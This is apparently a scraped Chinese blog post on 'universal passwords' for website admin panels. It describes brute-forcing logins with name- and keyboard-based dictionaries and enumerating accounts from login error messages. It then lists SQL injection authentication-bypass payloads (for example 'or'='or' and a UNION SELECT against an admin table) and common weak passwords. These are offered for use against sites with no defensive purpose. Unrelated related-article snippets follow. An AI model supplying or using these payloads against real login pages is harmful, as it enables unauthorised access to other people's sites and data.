网站后台万能密码/10大常用弱口令

news/2024/10/23 9:33:22/

方法 / 步骤

一: 手动探测

先手动猜测几个可能的弱口令,主要是判断站点有没有做登录失败次数限制,若没有限制,则可以使用工具字典工具进行测试

二: 使用字典测试

2.1 字典生成思路

国内很多安全测试团队,常用的弱口令检测方案一般有由以下依据组成

  • 姓名的全拼+数字 / 姓名首字母+数字 / 姓全拼+名的首字母+数字;

  • 键盘分布或 Shift+键盘布局;

  • 好记的数字/ 字母组合: 比如工号,特殊节日、纪念日、年月;

  • 特殊含义的单词、好记的特殊字符组合、特殊含义的字母用数字替换等。

  • 国内常用名TOP 常见组合;

2.2 字典使用策略

收集相关信息,使用社工字典生成等针对该服务工具,可对用户名和密码同时测试,也可以通过用户名登录失败返回的信息判断这个账号在系统中是否存在,如果存在则可以进一步进行对该账号的密码检测。

但现在很多服务为了防止系统遭受暴力请求/DDOS攻击 / 识别用户身份等 会使用验证码机制。通常在网站的 登录/密码找回/用户注册 使用验证码,但当这些验证码具有一定的规律性并且没有做好对应的防护措施时会导致攻击者通过爆破等方式猜解/绕过验证码机制,可导致任意用户注册、批量注册无用账户、重置任意用户密码、获取系统权限等危害。

常见的验证码主要有图片验证码,邮件/短信验证码, 滑动/语音验证码。

2.3 弱口令常用文本

'xor
'or''='
'or'='or'
"or "a"="a
')or('a'='a
'or'a'='a
"or"="a'='a
or 1=1--
'or 1=1--
a'or' 1=1--
"or 1=1--
1 or '1'='1'=1
1 or '1'='1' or 1=1
'OR 1=1
"or 1=1

2.4 DB注入常用检测若口令:

  • 用户名

      通常是替换表名admin(将下面整个复制粘贴到用户名输入框)

' UNION Select 1,1,1 FROM admin Where ''='

  • 密码:  1

2.5 PHP万能密码/弱口令:

'or 1=1/*

2.6 JSP站点常用/万能密码/弱口令:

1'or'1'='1
12345
123456
1234567
12345678
123456789
Password
P@ssw0rd
abc123


http://www.ppmy.cn/news/883721.html

相关文章

网络安全攻防之网站后台帐号密码暴力破解解析

前言 对于网站运行的个人站长而言,最担心的是应如何有效且安全的去管理自己的网站,否则自己辛辛苦苦经营的网站就会被不请自来的不速之客给攻破,轻则站点数据被窃取,重则整个网站都被攻陷,导致无法恢复。 本文主要从…

网站管理后台帐号密码暴力破解方法

【导读】 对于网站运行的个人站长而言,最担心的是应如何有效且安全的去管理自己的网站,否则自己辛辛苦苦经营的网站就会被不请自来的不速之客给攻破,轻则站点数据被窃取,重则整个网站都被攻陷,导致无法恢复。 本文主…

【谨慎学习】手把手教你破解网站管理后台帐号密码

【导读】 对于网站运行的个人站长而言,最担心的是应如何有效且安全的去管理自己的网站,否则自己辛辛苦苦经营的网站就会被不请自来的不速之客给攻破,轻则站点数据被窃取,重则整个网站都被攻陷,导致无法恢复。 本文主…

web后台登录口令暴力破解及防御

在实际网络安全评估测试中,前台是给用户使用,后台是给网站管理维护人员使用,前台功能相对简单,后台功能相对复杂,可能保护媒体文件上传,数据库管理等。前台用户可以自由注册,而后台是网站管理或…

ingress之503问题

ingress之503问题 背景: 部署好应用服务(nsyai-test名称空间下)后,通过ingress做七层反代,浏览器访问域名一直出现503的错误,其中30086端口为ingress-controller控制器nodeport型service端口 问题: 网上查看发现是不…

STC系列单片机和MacOS/Linux下载程序

STC系列单片机简介 stc89系列:传统单片机,一条指令一般至少12个时钟周期,12/24/48不等;具有外部中断、定时器、UART功能,时钟频率支持0-42M; stc12系列:高速单片机,很多型号支持内部…

React懒加载/动态加载(Suspense +lazy())简单实例

页面嵌套 两种页面嵌套的方式,一种是父子组件,一种是懒加载1、父子组件(可略,只用来做例子对比)2、使用懒加载 两种页面嵌套的方式,一种是父子组件,一种是懒加载 1、原本需要用父子组件来实现页…

【专题速递】在线K歌、云化XR、咔嚓剪辑和FFmpeg直播能力更新计划

// 在线K歌的技术方案选型有哪些?对于沉浸式XR我们又有什么新的思考?高性能低依赖的剪辑视频需要具备什么技术?7月29日LiveVideoStackCon2023上海站客户端体验与性能优化专场,为您解答。 客户端体验与性能优化 客户端作为直接面…